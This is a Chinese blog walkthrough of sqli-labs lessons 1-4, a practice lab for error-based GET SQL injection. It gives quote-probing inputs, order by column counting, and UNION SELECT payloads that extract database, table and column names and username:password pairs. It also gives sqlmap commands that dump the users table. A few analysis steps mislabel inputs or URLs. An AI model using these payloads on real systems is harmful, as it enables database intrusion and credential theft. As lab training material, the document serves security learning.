sqli-labs靶场实现(一)【GET基于报错的SQL注入】(less-1~4、具体步骤+图文详解)

最新推荐文章于 2023-10-07 23:02:11 发布
最新推荐文章于 2023-10-07 23:02:11 发布
阅读量709 收藏 3
点赞数
分类专栏: sqli-labs靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46709219/article/details/110931287
版权

一)GET基于报错的SQL注入
  1)SQL注入的分类
  2)get基于报错的SQL注入发现
      less1(get型单引号字符型报错)
      less2(get型单引号数字型报错)
      less3(get型单引号+括号闭合字符型报错)
      less4(get型双引号字符型报错)
  3)get基于报错的SQL注入利用
      less1
      less2
      less3
      less4
  4)利用sqlmap测试

——————————————————————————————————————————————————


一)GET基于报错的SQL注入

1)SQL注入的分类

根据注入位置数据类型可以将SQL注入分为两类:

a)数字型:select * from 表名 where id=id值;
b)字符型:select * from 表名 where id='id值';


2)get基于报错的SQL注入发现

通过在url中修改对应的id值(例如:正常的数字、大数字、字符【单引号、双引号、括号】、反斜杠)来探测url中是否存在注入点。
注:url编码——将url中出现的特殊字符或者汉字变换为浏览器可以识别的内容。

url编码:
%27————'
%20————空格
%22————"

hex码:
0x3a————:
0x7E————~

sqli-labs靶场(less1-4的get型基于报错的SQL注入):

a)环境:
win7(有phpstudy):192.168.1.106
kali(在kali浏览器中访问win7中的靶场):192.168.1.
在这里插入图片描述
在这里插入图片描述

b)less1(get型单引号字符型报错)
I)根据less1的提示(请输入id作为有数值的参数):
在这里插入图片描述
构造url:

测试id的有效数值:

id=1(正常返回用户1的账号密码)
id=2(正常返回用户2的账号密码)
id=3(正常返回用户3的账号密码)
...
id=15(正常返回,但是此时已经没有用户了)

注:之所以不用 192.168.1.106/sqli/index.php?id=1 而是
   直接192.168.1.106/sqli/?id=1 是因为我们已经将index.php设置为默认的首页了,
   只要有设置默认页面即使没有将它加在url也可以,如果没有设置默认页面那么就一定要
   将index.php等页面加在url中。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
结论:id的最大值(用户数量)为14

构造url:

判断参数id是否存在SQL注入:

id=1(正常)
id=1'(报错)

解析:
id=1’ 报错信息为:near ''1'' limit 0,1' at line 1【错误在’1’’ limit 0,1 附近】
I)先去掉报错信息自动为字符串加上的’ ‘就剩下 near '1'' limit 0,1 at line 1
II)我们构造url时输入的id值是 1',去掉1’ 就剩下 near '' limit 0,1 at line 1
III)猜测正确的SQL语句为:select login_name,password from admin where id='1' limit 0,1; (可见是单引号字符型)而我们构造后就变成:select login_name,password from admin where id='1'' limit 0,1; 多了一个单引号所以报错位置就是在 '14'' limit 0,1 这里。
在这里插入图片描述
c)less2(get型单引号数字型报错)
构造url:

判断参数id是否存在SQL注入:

id=1
id=1'

在这里插入图片描述
在这里插入图片描述
解析:
id=1’ 报错信息为:near '' limit 0,1' at line 1【错误在 ‘limit 0,1 附近】
I)先去掉报错信息自动为字符串加上的’ '就剩下 near ' limit 0,1 at line 1
II)猜测正确的SQL语句为:select login_name,password from admin where id=1 limit 0,1; (可见是数字型)
II)我们构造url时输入的id值是 1',变成:select login_name,password from admin where id=1' limit 0,1; 多了一个单引号所以报错位置就是在 ' limit 0,1 这里。

d)less3(get型单引号+括号闭合字符型报错)
构造url:

判断参数id是否存在SQL注入:

id=1(正常)
id=1'(报错)
id=1')--+或者id=1')--%20 (正常)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解析:
id=1" 报错信息为:near '"1"") limit 0,1' at line 1【错误在 “1"”) limit 0,1 附近】
I)先去掉报错信息自动为字符串加上的’ '就剩下 near "1"") limit 0,1 at line 1
II)报错信息中知道正常是有一对单引号的,但是还额外多了一个单引号和一个括号,证明程序本身是id=(‘id值’
III)猜测正确的SQL语句为:select login_name,password from admin where id=('id值') limit 0,1; (可见是数字型)
IV)我们构造url时输入的id值是 1',变成:select login_name,password from admin where id=('14'' limit 0,1; 多了一个单引号并且原本的括号没有闭合,所以报错位置就是在 '1'') limit 0,1 这里。
V)此时有效的的url应该是:id=1') --+ 或者 id=1') --%20

e)less4(get型双引号字符型报错)
构造url:

判断参数id是否存在SQL注入:

id=1(正常)
id=1'(正常)
id=1)(正常)
id=1"(报错)
id=1\(报错)
id=1" --+ 或者 id=1" --%20

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解析:
I)在mysql中用双引号引起来的字符串那么即使双引号中有括号、单引号也无用,也就是说此时 id="1')" 此时对于mysql而言就只是 id="1"
II)在mysql中\是转义的作用,也就是说原本单独出现 " 是符号,而 \" 就是字符串
III)id=1\ 报错信息为:near '''1\'') limit 0,1' at line 1【错误在 “1’’) limit 0,1 附近】
I)先去掉报错信息自动为字符串加上的’ ‘就剩下 near "1\'') limit 0,1 at line 1
II)报错信息中知道正常是有一对双引号的,但是还额外多了一个双引号和一个括号,证明程序本身是id=(“id值”
III)猜测正确的SQL语句为:select login_name,password from admin where id=("id值") limit 0,1; (可见是数字型)
IV)我们构造url时输入的id值是 1\,变成:select login_name,password from admin where id=("1’’ limit 0,1;原本的一对双引号的右边变成字符串而少了一个双引号并且原本的括号没有闭合,所以报错位置就是在 “1’’) limit 0,1这里。 V)此时有效的的url应该是:1”) --+或者1”) --%20`

3)get基于报错的SQL注入利用

1)判断是否存在SQL注入,若存在是字符型还是数字型
2)判断字段数————order by
3)利用union select联合查询获取表名
4)利用union select联合查询获字段名
5)利用union select联合查询获字段值


a)less1:

判断字段数————order by

根据前面less1的解析,正常的SQL语句是:select login_name,password from admin where id='id' limit 0,1; ,此时要使用order by那么SQL语句有效的SQL语句就是:select login_name,password from admin where id='id' order by 10 --+' limit 0,1; 所以构造的就是 1' order by 1 --+
II)判断字段数:

1' order by 1 --+(正常)
1' order by 2 --+(正常)
1' order by 3 --+(正常)
1' order by 4 --+(错误)

在这里插入图片描述
在这里插入图片描述

结论:一行中的字段数为3

用 hackbar 结合 union select 获取字段位置:

在这里插入图片描述
在这里插入图片描述
此时自动补全 union select 1,2,3
在这里插入图片描述

id=-1' union select 1,2,3 --+

在这里插入图片描述
利用union select联合查询获取所有库名

id=-1' UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述

利用union select联合查询获取表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述

利用union select联合查询获字段名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

在这里插入图片描述

利用union select联合查询获字段值

-1' union select 1,group_concat(username,0x3a,password,0x7E,0x7E),3 from users --+

在这里插入图片描述
注:因为less1是字符型所以如果采用数字型是没有效果的:
在这里插入图片描述

在这里插入图片描述


b)less2:
用 hackbar 结合 union select 获取字段位置:

id=1(正常)
id=1'(错误)
id=1"(错误)
id=1' --+(错误)
id=1" --+(错误)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

判断字段数————order by

id=1 order by 1 (没响应)
...
id=1 order by 4 (还是同order by 1 的页面相同,没响应)


id=1 order by 1' --+ (正常)
...
id=1 order by 4' --+(错误)

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
结论:是数字型,字段数是3。

判断字段显示位置:
在这里插入图片描述

利用union select联合查询获取所有库名

http://192.168.67.143/sqli/Less-1/?id=-1' UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述

利用union select联合查询获取表名

http://192.168.67.143/sqli/Less-1/?id=-1' UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述

利用union select联合查询获字段名

http://192.168.67.143/sqli/Less-1/?id=-1' UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

在这里插入图片描述

利用union select联合查询获字段值

http://192.168.67.143/sqli/Less-1/?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3 from users --+

在这里插入图片描述

c)less3:

id=1—(正常)
id=1'(错误)
id=1')(错误)
id=1') --+(正常)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
获取字段数:
在这里插入图片描述
在这里插入图片描述

判断字段显示位置:

http://192.168.67.143/sqli/Less-3/?id=1') UNION SELECT 1,2,3 --+

在这里插入图片描述

利用union select联合查询获取所有库名

http://192.168.67.143/sqli/Less-3/?id=-1') UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述

利用union select联合查询获取表名

http://192.168.67.143/sqli/Less-3/?id=-1') UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema='dvwa' --+

在这里插入图片描述

利用union select联合查询获字段名

http://192.168.67.143/sqli/Less-3/?id=-1') UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema='dvwa' and table_name='users' --+

在这里插入图片描述

利用union select联合查询获字段值

http://192.168.67.143/sqli/Less-3/?id=-1') UNION SELECT 1,group_concat(username,0x3a,password),3 from users --+

在这里插入图片描述

d)less4:

id=1(正常)
id=1'(同id=1一个页面,没响应)
id=1"(报错)
id=1") (报错)
id=1") --+ (正常)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

判断字段显示位置:

http://192.168.67.143/sqli/Less-4/?id=1") UNION SELECT 1,2,3 --+

利用union select联合查询获取所有库名

http://192.168.67.143/sqli/Less-4/?id=-1") UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata --+

利用union select联合查询获取表名

http://192.168.67.143/sqli/Less-3/?id=-4") UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema='dvwa' --+

利用union select联合查询获字段名

http://192.168.67.143/sqli/Less-4/?id=-1") UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema='dvwa' and table_name='users' --+

利用union select联合查询获字段值

http://192.168.67.143/sqli/Less-4/?id=-1") UNION SELECT 1,group_concat(username,0x3a,password),3 from users --+


4)利用sqlmap测试

a)判断是否存在SQL注入:

python sqlmap.py -u "http://192.168.67.143/sqli/Less-1/?id=1" --batch

在这里插入图片描述
结果图:
在这里插入图片描述
结论:存在“布尔盲注”、“报错显注”、“时间盲注”、“union联合查询注入”

b)爆出所有数据库:--dbs

python sqlmap.py -u "http://192.168.67.143/sqli/Less-1/?id=1" --dbs --batch

解析:有加 --batch 就可以将后面的交互询问都选择默认选项而不用我们手动选择

在这里插入图片描述

结果图:
在这里插入图片描述

c)爆出指定数据库security中所有表:--tables

python sqlmap.py -u "http://192.168.67.143/sqli/Less-1/?id=1" -D security --tables --batch

在这里插入图片描述

结果:
在这里插入图片描述

d)爆出指定数据库security中指定表users中所有字段:--columns

python sqlmap.py -u "http://192.168.67.143/sqli/Less-1/?id=1" -D security -T users --columns --batch

在这里插入图片描述

结果:
在这里插入图片描述

e)指定字段的数据dump出来:

python sqlmap.py -u "http://192.168.67.143/sqli/Less-1/?id=1" -D security -T users -C password,username --dump --batch

在这里插入图片描述

结果:
         在这里插入图片描述

less2-4的sqlmap使用方法相同就不再累赘讲解。

A&&K
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-LABS less-4打靶过程记录——初学者的打靶记录
xxfsdsb的博客
06-11 101
SQLi-LABS less-4打靶过程记录——初学者的打靶记录
sqli靶场——【Less-5】报错注入
weixin_63082823的博客
09-14 475
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
DMXA的博客
10-07 243
【代码】buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
靶场通关】sqli-labs less1-10
qq_21193587的博客
06-03 6935
Less-1 提示 用 ID=数字做为输入参数 http://192.168.80.131/Less-1/?id=1 加个’测试。直接显示了 SQL 语法错误,说明这是一个注入点。 id 虽然输入为数值 这里看源码或尝试 id=1’ and 1=1 --+ 和 ’ and 1=2 --+ 结果不同 sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='sql="SELECT∗FROMusersWHEREid=′id’ LIM
mysql less2_sqli-labs-master[Less-2]解题过程
weixin_29428137的博客
02-07 104
id=11.正常显示id=1'2.错误回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB #server version for the right syntax to use near '' LIMIT 0,1' at line 1'' LIMIT 0,1'表明:查询语...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs靶场
02-12
sqli-labs靶场
CTFweb篇-SQL注入(四)
weixin_44597701的博客
08-17 436
Less11 这一关主要就是改post请求,用post请求的参数来进行注入 填写admin登陆后仍然没有get参数 考虑就是post请求 这里就用burp suite抓包 这里就是post传入的参数值,改的就是这个值 我们把这个值拿到hackbar里面来进行操作 我们传入uname=admin’,系统会报错 right syntax to use near 'admin' LIMIT 0,1' at line 1 我们再传uname=admin",就没有报错了 证明这里是双单引号包裹 于是传入uname
use near ‘member LIMIT 0, 1000‘ at line 1
学习的博客
09-20 1161
我出现这个问题的场景是我用了mysql8.0版本,在我使用ssm中,发现涉及到member表的操作都出现问题了,然后,我跑到了mysql编译器上运行我的mysql语句,结果发现竟然不行,我就怀疑是member这个名字有问题,所以,我加上了引号,如下 `member` 这样就成功了。 ...
corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1
Shen19981110的博客
05-09 3306
新手学习SSM框架利用分页插件实现分页的时候出现了一个问题 错误信息: Exception in thread "main" org.springframework.jdbc.BadSqlGrammarException: ### Error querying database. Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the
mysql right syntax to use near 'OPTION SQL_SELECT_LIMIT=DEFAULT' at line 1
tiger-hu
07-12 2842
mysql right syntax to use near 'OPTION SQL_SELECT_LIMIT=DEFAULT' at line 1 新的mysql服务器,5.6报以上错误~~ 解决办法是更新mysql链接的jar包;   见:comment4 https://netbeans.org/bugzilla/show_bug.cgi?id=224260 Created a...
靶场sqli-labs的练习笔记(盲注Blind SQL报错注入等)第二章
m0_55314368的博客
06-16 182
2.时间注入,页面返回的值只有一种的时候(即为无论输入什么结果都按照正常的进行处理0),那么这时候我们就需要通过时间函数进行时间注入,通过页面的相应时间进行判断语句是否输入正确。由于and必须两边的条件都要满足,左边id=1肯定是真值,那么如果length函数猜错不等于8的时候就会没有回显。同理若ascii(substr(database(),1,1))=116中成立则执行1即通过,如果不成立则休眠。从而才出他的完整性。左边id=1必定成立,若右边不成立则没有反应,若为正确的返回不同的结果。
SQLI-LIBS靶场五-报错注入
qq_66291050的博客
05-18 156
less-5没有显存位了,不能使用联合查询,也就是说明UNION SELECT 1,2,3其中的1,2,3是不会被显示在网页返回的文字中。从靶场二跳到靶场五是因为其中真的没什么好讲的,把源码拿出来搞一个ECHO $sql 就可以在注入的时候看到执行语句的过程。这样写就差不多,当然了,细心的就会发现为什么是双引号闭合?首先,我们要了解一个MYSQL里面的UPDATEXML函数。发现是单引号,那么我们就用单引号闭合这个语句。这样写的,但是我发现,我这里是根本行不通的。剩下的我也懒得说,就这样。
(手工)【sqli-labs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程
05-28 913
报错注入+闭合】
(1) near "limit": syntax error (sqlite报错)
小鹰信息技术服务部
07-09 7919
今天在做一个安卓软件往数据库插入记录的时候程序报错,logcat提示为: (1) near "limit": syntax error ... 后面的具体信息就不看了,SQL语句都是自动生成的,不会有问题。 这里的“limit”是数据库表中的一个字段,类型为double,语法和内容上都看不出任何问题,反复测试,还是报这个错。 思考了好一阵子,突然开窍了,语法上没有任何问题,却提示syn

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值